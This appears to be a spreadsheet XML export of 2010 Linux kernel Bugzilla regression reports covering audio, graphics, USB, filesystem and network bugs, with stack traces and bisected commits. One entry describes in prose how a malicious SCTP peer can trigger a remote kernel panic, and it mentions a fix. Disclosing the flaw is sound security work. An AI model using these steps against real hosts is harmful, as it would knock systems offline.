    <t>On a Thinkpad T400s, i can hear sound from the internal speakers. If I connect headphones to the respective jack though, they remain silent. This is the case with a 2.6.35 kernel, but worked fine using 2.6.34. 00:1b.0 Audio device [0403]: Intel Corporation 82801I (ICH9 Family) HD Audio Controller [8086:293e] (rev 03) Subsystem: Lenovo Device [17aa:20f2] Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Interrupt: pin B routed to IRQ 47 Region 0: Memory at f2620000 (64-bit, non-prefetchable) [size=16K] Capabilities: &lt;access denied&gt; Kernel driver in use: HDA Intel Kernel modules: snd-hda-intel</t>
  </si>
  <si>
    <t>Probing, false LVDS detection [enabled in VBT but not connected!]</t>
  </si>
  <si>
    <t>2010-09-08 10:52 UTC</t>
  </si>
  <si>
    <t>2011-01-24 12:59 UTC</t>
  </si>
  <si>
    <t>Created attachment 29292 [details] Dmesg of wrong resolution/modeline detection, followed by xrandr commands. On an all in one desktop computer, resolution won't be properly detected, and it will show a black band on the right (screen shifted on the left). Running xrandr auto-setting on "VGA1" output fixes it: # xrandr Screen 0: minimum 320 x 200, current 1024 x 768, maximum 4096 x 4096 LVDS1 connected 1024x768+0+0 (normal left inverted right x axis y axis) 0mm x 0mm 1024x768 60.0*+ 85.0 75.0 70.1 60.0* 832x624 74.6 800x600 85.1 72.2 75.0 60.3 56.2 640x480 85.0 72.8 75.0 59.9 720x400 85.0 640x400 85.1 640x350 85.1 VGA1 connected 1024x768+0+0 (normal left inverted right x axis y axis) 410mm x 230mm 1366x768 60.0 + 1280x720 60.0 1024x768 75.1 70.1 60.0* 800x600 75.0 60.3 640x480 60.0 # xrandr --output VGA1 --auto # xrandr Screen 0: minimum 320 x 200, current 1366 x 768, maximum 4096 x 4096 LVDS1 connected 1024x768+0+0 (normal left inverted right x axis y axis) 0mm x 0mm 1024x768 60.0*+ 85.0 75.0 70.1 60.0* 832x624 74.6 800x600 85.1 72.2 75.0 60.3 56.2 640x480 85.0 72.8 75.0 59.9 720x400 85.0 640x400 85.1 640x350 85.1 VGA1 connected 1366x768+0+0 (normal left inverted right x axis y axis) 410mm x 230mm 1366x768 60.0*+ 1280x720 60.0 1024x768 75.1 70.1 60.0 800x600 75.0 60.3 640x480 60.0 Lspci of this machine is in attachment 28041 [details] . Please note that to obtain this log, I used Daniel Vetters's intel-gtt-rework branch, that fixed another boot-blocking bug 16891 . Also, this bug might be a regression between 2.6.36-rc2 and 2.6.36-rc3, as previous tests with -rc2 didn't show this behavior.</t>
  </si>
  <si>
    <t>touchpad left / right click buttons do not work lenovo s10-3t</t>
  </si>
  <si>
    <t>2010-09-08 21:18 UTC</t>
  </si>
  <si>
    <t>paulatgm</t>
  </si>
  <si>
    <t>2011-01-24 12:48 UTC</t>
  </si>
  <si>
    <t>Yan Li</t>
  </si>
  <si>
    <t>This new type touchpad has a left click in the lower left corner and right click in the lower right. These worked on ubuntu lucid with kernel 2.6.32, but fail on ubuntu maverick with kernel 2.6.35. They have also been tested with ubuntu daily kernel build of 2.6.36 from Sep 8, 2010. Even though the left /right click worked on kernel 2.6.32, there was another problem on which occurred when attemption to select text. After pressing and activating the left click, any touch to the pad (to start selecting text) immediately would cause the mouse to jump off the nearest corner of the screen. Thus text selection is impossible in kernel 2.6.32. I have no way to test this in current kernels, since the click capability is missing. On both lucid and maverick, tapping the pad will result in a left click, and bottom edge horizontal scrolling and right edge vertical scrolling works. In other words, other parts seem ok. All operating and kernel log files are posted on ubuntu bugfile 621821 at: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/621821</t>
  </si>
  <si>
    <t>Microphone levels too low</t>
  </si>
  <si>
    <t>2010-09-09 22:20 UTC</t>
  </si>
  <si>
    <t>2010-09-30 06:17 UTC</t>
  </si>
  <si>
    <t>Lenovo Thinkpad T400s. Microphone volume was fine on 2.6.34. Using 2.6.35, even when maxing out the recording volume slider, the volume is much too low.</t>
  </si>
  <si>
    <t>spinlock lockup in __make_request &lt;- submit_bio &lt;- ondemand_readahead</t>
  </si>
  <si>
    <t>2010-09-11 09:36 UTC</t>
  </si>
  <si>
    <t>2010-09-14 18:10 UTC</t>
  </si>
  <si>
    <t>Created attachment 29562 [details] BUG screenshot After a week uptime of 2.6.36-rc3 (I ran 2.6.35 before that), I was greeted by a black screen of death today in the morning: (see screenshot in attachment; partial transcript:) sending NMI to all CPUs: BUG: soinlock lockup on CPU#0, ktorrent/4313, ffff8802... PID: 4313, comm: ktorrent Tainted: G M D W 2.6.36-rc3 #3 Call Trace: [...] do_raw_spin_lock+0x118/0x147 [...] _raw_spin_lock_irq+0x44/0x49 [...] ? __make_request+0x5c/0x400 [...] __make_request+0x5c/0x400 [...] generic_make_request+0x23a/0x2a9 [...] submit_bio+0xad/b6 [...] mpage_bio_submit... [...] do_mpage_readpage... [...] ? get_parent_ip... [...] ? sub_preempt_count... [...] ? __lru_cache_add... [...] mpage_readpages... [...] ? ext4_get_block... [...] ? __alloc_pages_nodemask... [...] ? ext4_get_block... [...] ext4_readpages... [...] __do_page_cache_readahead... [...] ? __do_page_cache_readahead... [...] ra_submit... [...] ondemand_readahead... This is a system with Phenom II x4 and Radeon graphics. Since kernel mode setting is fairly new for radeon, it is possible that the lockup happened with earlier kernels too but simply ended in a lockup without trace dump to the screen. IOW, it is not clear to me whether this is a regression or not. The bug happened while kaffeine wrote an MPEG 2 TS to the same filesystem from which ktorrent was reading. Of course this kind of commonplace workload happened without problem two or three times before during the week in which I ran 2.6.36-rc3.</t>
  </si>
  <si>
    <t>2.6.35.*: horrible (exponential? &gt;linear) slowdown to unusability (ACPI idle?)</t>
  </si>
  <si>
    <t>2010-09-11 19:59 UTC</t>
  </si>
  <si>
    <t>2010-09-20 20:43 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.35.*: horrible (exponential? &gt;linear) slowdown to unusability (ACPI idle?) Submitter : Nix &lt;nix@esperi.org.uk&gt; Date : 2010-09-05 0:51 Message-ID : 87zkvx2ese.fsf@spindle.srvr.nix References : http://marc.info/?l=linux-kernel&amp;m=128364994602942&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline. Caused by: commit 30a564be9d9554c168a654eddc2165869cc0d7bf Author: Thomas Gleixner &lt;tglx@linutronix.de&gt; Date: Tue Apr 13 15:31:36 2010 +0200 x86, hpet: Restrict read back to affected ATI chipsets After programming the HPET, we do a readback as a workaround for ATI/SBx00 chipsets as a synchronization. Unfortunately this triggers an erratum in newer ICH chipsets (ICH9+) where reading the comparator immediately after the write returns the old value. Furthermore, as always, I/O reads are bad for performance. Therefore, restrict the readback to the chipsets that need it, or, for debugging purposes, when we are running with hpet=verbose. Signed-off-by: Thomas Gleixner &lt;tglx@linutronix.de&gt; Acked-by: Venkatesh Pallipadi &lt;venki@google.com&gt; LKML-Reference: &lt;20100225185348.GA9674@linux-os.sc.intel.com&gt; Signed-off-by: H. Peter Anvin &lt;hpa@zytor.com&gt; First-Bad-Commit : 30a564be9d9554c168a654eddc2165869cc0d7bf</t>
  </si>
  <si>
    <t>Multiple Requests and Kernel GPFs (descriptor buffer corruption in AT context)</t>
  </si>
  <si>
    <t>2.6.32, 2.6.34</t>
  </si>
  <si>
    <t>2010-09-12 09:00 UTC</t>
  </si>
  <si>
    <t>2010-11-06 08:32 UTC</t>
  </si>
  <si>
    <t>Reported by Freddie Witherden on August 2 2010: &gt;&gt;&gt; I have been trying to speed up my forensics library, which currently gets around 13MiB/s when reading blocks of data and an effective rate of 100MiB/s when reading small 10 byte fragments from fixed page offsets. One thought was instead of making requests and waiting for a response I decided to make multiple requests (so always have several requests on the go) and using poll() to read responses back. The problem is that although the ioctl succeeds it is flakey, very flakey. My onboard FireWire controller results in GPFs from the kernel -- and on one occasion a hard out crash. My expresscard adapter, however, 'gives up' after a few 100 requests, with all subsequent requests giving no data read() gives me 24 bytes. The target is fine before and after. Now, the later result could be because of what's going on at the target, however the protection faults do concern me. Has anyone else experienced these kinds of faults and are there any known problems with having multiple requests on the go. &lt;&lt;&lt; Some further information is in the replies to the initial post, http://thread.gmane.org/gmane.linux.kernel.firewire.user/3989 . E.g. http://article.gmane.org/gmane.linux.kernel.firewire.user/3993 and http://article.gmane.org/gmane.linux.kernel.firewire.user/3995 show a general protection fault in firewire-ohci's at_context_transmit() -&gt; context_get_descriptors().</t>
  </si>
  <si>
    <t>[regression] *ERROR* timed out waiting for FORCE_DETECT in 36rc3 on i915</t>
  </si>
  <si>
    <t>2010-09-12 18:39 UTC</t>
  </si>
  <si>
    <t>2010-09-22 08:34 UTC</t>
  </si>
  <si>
    <t>Subject : [regression] *ERROR* timed out waiting for FORCE_DETECT in 36rc3 on i915 Submitter : Andi Kleen &lt;andi@firstfloor.org&gt; Date : 2010-09-08 13:53 Message-ID : 87mxrswddf.fsf@basil.nowhere.org References : http://marc.info/?l=linux-kernel&amp;m=128395400624946&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[regression] i915 incorrectly detects bogus LVDS connection instead of LVDS1</t>
  </si>
  <si>
    <t>2.6.36-rc4</t>
  </si>
  <si>
    <t>2010-09-12 18:43 UTC</t>
  </si>
  <si>
    <t>2010-10-03 21:00 UTC</t>
  </si>
  <si>
    <t>Subject : [regression] i915 incorrectly detects bogus LVDS connection instead of LVDS1 Submitter : Woody Suwalski &lt;terraluna977@gmail.com&gt; Date : 2010-09-08 15:10 Message-ID : AANLkTim2mrVRCKg-2couMTFV7krHQp0+2e_cbaiT_KYW@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=128395866331382&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>radeon kms freezes on boot with video= option</t>
  </si>
  <si>
    <t>2010-09-13 22:28 UTC</t>
  </si>
  <si>
    <t>2010-09-26 20:14 UTC</t>
  </si>
  <si>
    <t>Created attachment 29832 [details] dmesg-2.6.36-rc4 (cmd line: root=/dev/sda2 hpet=force) I have a Dell Inspiron 600m laptop with a radeon mobility 9000 card. Kernel v2.6.36-rc4 compiled with KMS support produces a hard freeze on boot if I use a video= boot option. I see this also with kernel 2.6.36-rc1 but not with 2.6.35. This is the kernel command line that makes the kernel freeze on boot: root=/dev/sda2 hpet=force video=1024x768-24@60 The kernel boots fine with this command line: root=/dev/sda2 hpet=force I attach a dmesg captured after booting without a video= option.</t>
  </si>
  <si>
    <t>kernel softirq warning on boot</t>
  </si>
  <si>
    <t>2010-09-14 15:19 UTC</t>
  </si>
  <si>
    <t>2010-09-20 18:55 UTC</t>
  </si>
  <si>
    <t>17131 17321</t>
  </si>
  <si>
    <t>In the 2.6.36 rc kernels I noticed a warning on every boot. It may be related to upgrading the cpu to dual-core rather than upgrading the kernel. [ 14.332011] ------------[ cut here ]------------ [ 14.332021] WARNING: at kernel/softirq.c:143 _local_bh_enable_ip+0x41/0x8b() [ 14.332024] Hardware name: System Product Name [ 14.332026] Modules linked in: bridge stp llc reiserfs fuse coretemp hwmon_vid radeonfb fb_d dc loop firewire_sbp2 snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_mid i snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device asus_atk0110 snd wacom processor soundcore button psmouse lm6 3 snd_page_alloc led_class parport_pc i2c_i801 shpchp parport serio_raw joydev evdev tpm_tis pci_hotplug tpm tpm_bios rng_core ext3 jbd mbcache usbhid hid sg sr_mod cdrom sd_mod crc_t10dif radeon pata_acpi ttm ata_generic drm_kms_helper ata_piix ehci_hcd uhci_hcd drm i2c_algo_bit i2c_core libata atl1 thermal thermal_sys firewire_ohci usbcore mii firewire_core crc_itu_t scsi_mod nls_base [last unloaded: scsi_wait_scan] [ 14.332101] Pid: 0, comm: swapper Not tainted 2.6.36-rc4-r600fence-amd64 #1 [ 14.332104] Call Trace: [ 14.332106] &lt;IRQ&gt; [&lt;ffffffff810442f8&gt;] ? warn_slowpath_common+0x78/0x8c [ 14.332116] [&lt;ffffffff8104985b&gt;] ? _local_bh_enable_ip+0x41/0x8b [ 14.332122] [&lt;ffffffff812515e5&gt;] ? netpoll_rx+0x6d/0x79 [ 14.332126] [&lt;ffffffff81253721&gt;] ? netif_rx+0xd/0x7b [ 14.332130] [&lt;ffffffff810403a6&gt;] ? rebalance_domains+0xd1/0x13b [ 14.332135] [&lt;ffffffff810aaf19&gt;] ? perf_event_task_tick+0x6a/0x186 [ 14.332146] [&lt;ffffffffa00c2994&gt;] ? atl1_intr+0x8d9/0x9a5 [atl1] [ 14.332151] [&lt;ffffffff8108d68b&gt;] ? handle_IRQ_event+0x4c/0x104 [ 14.332156] [&lt;ffffffff8100e6a6&gt;] ? read_tsc+0x5/0x16 [ 14.332160] [&lt;ffffffff8108f2fb&gt;] ? handle_edge_irq+0xd9/0x120 [ 14.332164] [&lt;ffffffff8100af68&gt;] ? handle_irq+0x17/0x1f [ 14.332168] [&lt;ffffffff8100a62a&gt;] ? do_IRQ+0x54/0xb9 [ 14.332173] [&lt;ffffffff81305093&gt;] ? ret_from_intr+0x0/0x11 [ 14.332175] &lt;EOI&gt; [&lt;ffffffff8100fb50&gt;] ? mwait_idle+0x75/0x80 [ 14.332182] [&lt;ffffffff8100fb02&gt;] ? mwait_idle+0x27/0x80 [ 14.332187] [&lt;ffffffff81007b64&gt;] ? cpu_idle+0xaa/0x120 [ 14.332192] [&lt;ffffffff816bad4f&gt;] ? start_kernel+0x3ce/0x3d9 [ 14.332197] [&lt;ffffffff816ba3ba&gt;] ? x86_64_start_kernel+0xf9/0x106 [ 14.332200] ---[ end trace 76feca083f1d81b1 ]---</t>
  </si>
  <si>
    <t>cdrom drive doesn't detect removal</t>
  </si>
  <si>
    <t>2010-09-14 19:36 UTC</t>
  </si>
  <si>
    <t>2011-03-30 22:17 UTC</t>
  </si>
  <si>
    <t>Subject : [REGRESSION] cdrom drive doesn't detect removal Submitter : Maxim Levitsky &lt;maximlevitsky@gmail.com&gt; Date : 2010-09-12 9:49 Message-ID : 1284284969.2928.18.camel@maxim-laptop References : http://marc.info/?l=linux-kernel&amp;m=128428499013930&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline. Caused by: commit 6b4517a7913a09d3259bb1d21c9cb300f12294bd Author: Tejun Heo &lt;tj@kernel.org&gt; Date: Wed Apr 7 18:53:59 2010 +0900 block: implement bd_claiming and claiming block Currently, device claiming for exclusive open is done after low level open - disk-&gt;fops-&gt;open() - has completed successfully. This means that exclusive open attempts while a device is already exclusively open will fail only after disk-&gt;fops-&gt;open() is called. cdrom driver issues commands during open() which means that O_EXCL open attempt can unintentionally inject commands to in-progress command stream for burning thus disturbing burning process. In most cases, this doesn't cause problems because the first command to be issued is TUR which most devices can process in the middle of burning. However, depending on how a device replies to TUR during burning, cdrom driver may end up issuing further commands. This can't be resolved trivially by moving bd_claim() before doing actual open() because that means an open attempt which will end up failing could interfere other legit O_EXCL open attempts. ie. unconfirmed open attempts can fail others. This patch resolves the problem by introducing claiming block which is started by bd_start_claiming() and terminated either by bd_claim() or bd_abort_claiming(). bd_claim() from inside a claiming block is guaranteed to succeed and once a claiming block is started, other bd_start_claiming() or bd_claim() attempts block till the current claiming block is terminated. bd_claim() can still be used standalone although now it always synchronizes against claiming blocks, so the existing users will keep working without any change. blkdev_open() and open_bdev_exclusive() are converted to use claiming blocks so that exclusive open attempts from these functions don't interfere with the existing exclusive open. This problem was discovered while investigating bko#15403. https://bugzilla.kernel.org/show_bug.cgi?id=15403 The burning problem itself can be resolved by updating userspace probing tools to always open w/ O_EXCL. Signed-off-by: Tejun Heo &lt;tj@kernel.org&gt; Reported-by: Matthias-Christian Ott &lt;ott@mirix.org&gt; Cc: Kay Sievers &lt;kay.sievers@vrfy.org&gt; Signed-off-by: Jens Axboe &lt;jens.axboe@oracle.com&gt; First-Bad-Commit : 6b4517a7913a09d3259bb1d21c9cb300f12294bd</t>
  </si>
  <si>
    <t>Remote/local Denial of Service vulnerability in SCTP packet/chunk handling</t>
  </si>
  <si>
    <t>2010-09-15 12:17 UTC</t>
  </si>
  <si>
    <t>Thomas Dreibholz</t>
  </si>
  <si>
    <t>2012-05-12 15:45 UTC</t>
  </si>
  <si>
    <t>Created attachment 30132 [details] Patch to fix the problem sctp_outq_flush() in net/sctp/outqueue.c may call sctp_packet_reset() on a packet structure which has already been filled with chunks. sctp_packet_reset() will not take care of the chunks in its list and only reset the packet length. After that, the SCTP code assumes the packet to be re-initialized and adds further chunks to the structure. The length will be wrong. When actually trying to transmit the packet, the packet sk_buff structure may be exceeded within sctp_packet_transmit(), resulting in skb_over_panic() =&gt; denial of service. Such a DoS can be triggered by a malicious remote SCTP instance, as follows: - The remote endpoint has to use two paths (i.e. 2 IP addresses); easy to achieve using an IPv4 address and an IPv6 address -&gt; path A and B. - The remote user has to trigger the transmission of a HEARTBEAT_ACK on path A. This is trivial, by sending a HEARTBEAT chunk. sctp_outq_flush() will call sctp_packet_config() for the packet on path A. The HEARTBEAT_ACK will be added to this packet. - The remote user has to trigger a DATA chunk retransmission on path B. This is trivial, since it only has to send appropriate SACK chunks. sctp_outq_flush() notices that the retransmission is on a different path and calls sctp_packet_config() for the packet on path B. The DATA chunk to be retransmitted is added to this packet. - The local instance has to send another DATA chunk on path A. This depends on the application, but should be easy to trigger from a remote instance. sctp_outq_flush() notices that the path has changed again, and calls sctp_packet_config() for the packet on path A. This resets the size of the HEARTBEAT_ACK chunk, but the chunk remains in the packet. If size(HEARTBEAT_ACK) + size(DATA) &gt; MTU - overhead, the next call to sctp_packet_transmit() causes the kernel panic =&gt; DoS. PID: 13309 TASK: f6636600 CPU: 1 COMMAND: "scriptingclient" #0 [e4d91968] crash_kexec at c0189fea #1 [e4d919b4] do_invalid_op at c0104a46 #2 [e4d91a50] error_code (via invalid_op) at c058d1a1 EAX: 0000008b EBX: f89e168d ECX: ffffff78 EDX: 00000000 EBP: e4d91ab8 DS: 007b ESI: f601e000 ES: 007b EDI: e44570e8 GS: 00e0 CS: 0060 EIP: c04b9d7c ERR: ffffffff EFLAGS: 00010286 #3 [e4d91a84] skb_over_panic at c04b9d7c #4 [e4d91a94] sctp_packet_transmit at f89e1688 #5 [e4d91ac8] sctp_packet_transmit at f89e1688 #6 [e4d91b14] sctp_packet_transmit_chunk at f89e1d23 #7 [e4d91b2c] sctp_outq_flush at f89d78f9 #8 [e4d91ba8] sctp_outq_uncork at f89d7994 #9 [e4d91bb0] sctp_cmd_interpreter at f89cce71 #10 [e4d91c00] sctp_side_effects at f89cdbff #11 [e4d91c30] sctp_do_sm at f89cdd3d #12 [e4d91cdc] sctp_assoc_bh_rcv at f89d1279 #13 [e4d91d0c] sctp_inq_push at f89d6773 #14 [e4d91d14] sctp_rcv at f89e2e5d #15 [e4d91d8c] ip_local_deliver_finish at c04ec6e5 #16 [e4d91db0] ip_local_deliver at c04ec93a #17 [e4d91dcc] ip_rcv_finish at c04ebf98 #18 [e4d91df4] ip_rcv at c04ec449 #19 [e4d91e1c] netif_receive_skb at c04c37a4 #20 [e4d91e58] e1000_receive_skb at f80a45bb #21 [e4d91e68] e1000_clean_rx_irq at f80a88b6 #22 [e4d91edc] e1000_clean at f80a799d #23 [e4d91efc] net_rx_action at c04c410a #24 [e4d91f28] __do_softirq at c0153132 #25 [e4d91f70] do_softirq at c0153290 #26 [e4d91f7c] irq_exit at c01533e0 #27 [e4d91f84] do_IRQ at c0591240 #28 [e4d91fb0] common_interrupt at c0103a2b EAX: 9af6e0c6 EBX: b0dad373 ECX: 00000005 EDX: 4d995cbc DS: 007b ESI: 598130cd ES: 007b EDI: 00b5dfc0 SS: 007b ESP: bfca6d80 EBP: bfca6df8 GS: 0033 CS: 0073 EIP: 0804b816 ERR: ffffff55 EFLAGS: 00000a86 In a similar way, the problem can also be triggered by a local user, having only the permission to establish SCTP associations. Of course, the problem can also occur during normal network operation, just by a retransmission at the wrong time. The attached patch against 2.6.36-rc4 (git repository) fixes sctp_outq_flush() by ensuring that the packet on each path is initialized only once. Furthermore, a BUG_ON() statement ensures that further problems by calling sctp_packet_reset() on packets with chunks are detected directly.</t>
  </si>
  <si>
    <t>PROBLEM: Kernel panic on 2.6.36-rc4 when loading intel_ips on Core i3 laptop</t>
  </si>
  <si>
    <t>2010-09-18 19:24 UTC</t>
  </si>
  <si>
    <t>2010-10-17 19:47 UTC</t>
  </si>
  <si>
    <t>Subject : PROBLEM: Kernel panic on 2.6.36-rc4 when loading intel_ips on Core i3 laptop Submitter : infernix &lt;infernix@infernix.net&gt; Date : 2010-09-15 14:35 Message-ID : 4C90D998.6050103@infernix.net References : http://marc.info/?l=linux-kernel&amp;m=128456187928496&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>BUG: unable to handle kernel paging request in minix_count_free_blocks</t>
  </si>
  <si>
    <t>2010-09-19 14:04 UTC</t>
  </si>
  <si>
    <t>Richard W.M. Jones</t>
  </si>
  <si>
    <t>2012-06-13 14:58 UTC</t>
  </si>
  <si>
    <t>This is a copy of the Red Hat Bugzilla bug here: https://bugzilla.redhat.com/show_bug.cgi?id=635266 Description of problem: I have a minix filesystem which provokes the stack trace attached (2.6.36-0.22.rc4.git2.fc15.x86_64 and also earlier kernel versions). There's nothing particularly special about the filesystem. I made it simply by installing Minix 3.1.7 in a qemu VM. Unfortunately though the disk image that contains it is pretty large (4GB) so it's going to be quite hard to provide a copy of it for anyone. [ 119.975051] BUG: unable to handle kernel paging request at ffff88001f3fd000 [ 119.975051] IP: [&lt;ffffffffa01070b2&gt;] count_free+0xb2/0x137 [minix] [ 119.975051] PGD 1a44063 PUD 1a48063 PMD 8067 PTE 0 [ 119.975051] Oops: 0000 [#1] SMP [ 119.975051] last sysfs file: /sys/devices/virtio-pci/virtio1/block/vda/dev [ 119.975051] CPU 0 [ 119.975051] Modules linked in: minix nls_utf8 hfsplus hfs vfat fat i2c_piix4 i2c_core virtio_blk virtio_net virtio_console virtio_rng virtio_balloon virtio_pci sym53c8xx virtio_ring virtio scsi_transport_spi libcrc32c ext2 crc7 crc_itu_t crc_ccitt [ 119.975051] [ 119.975051] Pid: 230, comm: guestfsd Not tainted 2.6.36-0.22.rc4.git2.fc15.x86_64 #1 /Bochs [ 119.975051] RIP: 0010:[&lt;ffffffffa01070b2&gt;] [&lt;ffffffffa01070b2&gt;] count_free+0xb2/0x137 [minix] [ 119.975051] RSP: 0018:ffff88001cdc3d70 EFLAGS: 00000203 [ 119.975051] RAX: 00000000fffffea2 RBX: ffff88001f07e000 RCX: 000000000037f000 [ 119.975051] RDX: 00000000000c751f RSI: ffff88001ca354d0 RDI: 000000000037f001 [ 119.975051] RBP: ffff88001cdc3d90 R08: 000000000178ca99 R09: 0000000000000019 [ 119.975051] R10: ffff88001ca35000 R11: 0000000000000019 R12: 0000000000001000 [ 119.975051] R13: 0000000000000000 R14: ffff88001cdc3e00 R15: 00007fff9a2d42c0 [ 119.975051] FS: 00007f1f4c7ff7c0(0000) GS:ffff880002c00000(0000) knlGS:0000000000000000 [ 119.975051] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 119.975051] CR2: ffff88001f3fd000 CR3: 000000001c47a000 CR4: 00000000000006f0 [ 119.975051] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 119.975051] DR3: 0000000000000000 DR6: 0000000000000000 DR7: 0000000000000000 [ 119.975051] Process guestfsd (pid: 230, threadinfo ffff88001cdc2000, task ffff88001c65a440) [ 119.975051] Stack: [ 119.975051] ffff88001ce5c000 ffff88001ce5c000 000000000fc00007 ffff88001cdc3ec8 [ 119.975051] &lt;0&gt; ffff88001cdc3da8 ffffffffa01072fa ffff88001cdc3e28 ffff88001cdc3dd8 [ 119.975051] &lt;0&gt; ffffffffa0109628 ffff88001cdc3dd8 ffff88001cdc3e28 ffff88001caa43d8 [ 119.975051] Call Trace: [ 119.975051] [&lt;ffffffffa01072fa&gt;] minix_count_free_blocks+0x23/0x2c [minix] [ 119.975051] [&lt;ffffffffa0109628&gt;] minix_statfs+0x5a/0xb0 [minix] [ 119.975051] [&lt;ffffffff8114d60e&gt;] statfs_by_dentry+0x56/0x6e [ 119.975051] [&lt;ffffffff8114d641&gt;] vfs_statfs+0x1b/0xb0 [ 119.975051] [&lt;ffffffff8114d734&gt;] do_statfs_native+0x22/0x3c [ 119.975051] [&lt;ffffffff8114d79a&gt;] sys_statfs+0x4c/0x8f [ 119.975051] [&lt;ffffffff8113377a&gt;] ? mntput+0x1d/0x1f [ 119.975051] [&lt;ffffffff81009cea&gt;] ? sysret_check+0x2e/0x69 [ 119.975051] [&lt;ffffffff810801d5&gt;] ? trace_hardirqs_on_caller+0x10b/0x12f [ 119.975051] [&lt;ffffffff8149c10a&gt;] ? trace_hardirqs_on_thunk+0x3a/0x3f [ 119.975051] [&lt;ffffffff81009cb2&gt;] system_call_fastpath+0x16/0x1b [ 119.975051] Code: 85 f6 0f 84 9f 00 00 00 48 8b 4e 20 89 d0 31 ff 48 c1 e1 03 49 0f af c9 48 29 c8 48 c1 e8 04 01 c0 eb 26 48 8b 5e 28 89 f9 ff c7 &lt;8a&gt; 0c 0b 88 cb 83 e1 0f c0 fb 04 83 e3 0f 44 03 04 9d b0 b0 10 [ 119.975051] RIP [&lt;ffffffffa01070b2&gt;] count_free+0xb2/0x137 [minix] [ 119.975051] RSP &lt;ffff88001cdc3d70&gt; [ 119.975051] CR2: ffff88001f3fd000 [ 119.975051] ---[ end trace 33e5808896065909 ]--- Version-Release number of selected component (if applicable): Linux version 2.6.36-0.22.rc4.git2.fc15.x86_64 (mockbuild@x86-07.phx2.fedoraproject.org) (gcc version 4.5.1 20100907 (Red Hat 4.5.1-3) (GCC) ) #1 SMP Wed Sep 15 12:48:54 UTC 2010 (also happens with earlier kernel versions, I tested several versions from 2.6.33 onwards) How reproducible: Always. Steps to Reproduce: 1. Install Minix 3.1.7 in a qemu (not KVM) VM. 2. Attach the disk to a Rawhide VM, or just run LIBGUESTFS_DEBUG=1 virt-df -h /dev/vg/minix Actual results: Spectacular crash. Expected results: Shouldn't crash. Additional info: Looking a bit more closely, what fails is *not* the mount, but the statfs system call on the mounted filesystem. To reproduce this you would have to first mount /dev/vda7 (readonly, not sure if that matters), and then perform a statfs(2) system call on the filesystem.</t>
  </si>
  <si>
    <t>[BUG, Regression, bisected] USB mouse causes bug on 1st insert, ignored on 2nd insert, lsusb stuck at usbdev_open</t>
  </si>
  <si>
    <t>2010-09-20 19:34 UTC</t>
  </si>
  <si>
    <t>2010-09-26 20:11 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG, Regression, bisected] USB mouse causes bug on 1st insert, ignored on 2nd insert, lsusb stuck at usbdev_open Submitter : Phil Turmel &lt;philip@turmel.org&gt; Date : 2010-09-20 1:33 Message-ID : 4C96B9DB.8030403@turmel.org References : http://marc.info/?l=linux-kernel&amp;m=128494643327096&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline. Caused by: commit 8fe294caf8c868edd9046251824a0af91991bf43 Author: Guillaume Chazarain &lt;guichaz@gmail.com&gt; Date: Sun Sep 12 21:32:35 2010 +0200 HID: fix hiddev's use of usb_find_interface My macbook infrared remote control was broken by commit bd25f4dd6972755579d0ea50d1a5ace2e9b00d1a ("HID: hiddev: use usb_find_interface, get rid of BKL"). This device appears in dmesg as: apple 0003:05AC:8242.0001: hiddev0,hidraw0: USB HID v1.11 Device [Apple Computer, Inc. IR Receiver] on usb-0000:00:1d.2-1/input0 It stopped working as lircd was getting ENODEV when opening /dev/usb/hiddev0. AFAICS hiddev_driver is a dummy driver so usb_find_interface(&amp;hiddev_driver) does not find anything. The device is associated with the usbhid driver, so let's do usb_find_interface(&amp;hid_driver) instead. $ ls -l /sys/devices/pci0000:00/0000:00:1d.2/usb7/7-1/7-1:1.0/usb/hiddev0/device/driver lrwxrwxrwx 1 root root 0 2010-09-12 16:28 /sys/devices/pci0000:00/0000:00:1d.2/usb7/7-1/7-1:1.0/usb/hiddev0/device/driver -&gt; ../../../../../../bus/usb/drivers/usbhid Signed-off-by: Guillaume Chazarain &lt;guichaz@gmail.com&gt; Signed-off-by: Jiri Kosina &lt;jkosina@suse.cz&gt; First-Bad-Commit : 8fe294caf8c868edd9046251824a0af91991bf43</t>
  </si>
  <si>
    <t>[i915] 2.6.36-rc4-git2 (Fedora snapshot) - kernel BUG at drivers/gpu/drm/i915/i915_gem.c:1444!</t>
  </si>
  <si>
    <t>2.6.36-rc4-git2</t>
  </si>
  <si>
    <t>2010-09-20 19:39 UTC</t>
  </si>
  <si>
    <t>2010-09-22 08:03 UTC</t>
  </si>
  <si>
    <t>Subject : [i915] 2.6.36-rc4-git2 (Fedora snapshot) - kernel BUG at drivers/gpu/drm/i915/i915_gem.c:1444! Submitter : Shawn Starr &lt;shawn.starr@rogers.com&gt; Date : 2010-09-20 5:23 Message-ID : 650240.84760.qm@smtp101.rog.mail.re2.yahoo.com References : http://marc.info/?l=linux-kernel&amp;m=128496063804248&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>screen failes in kde</t>
  </si>
  <si>
    <t>2.6.35-rc4+</t>
  </si>
  <si>
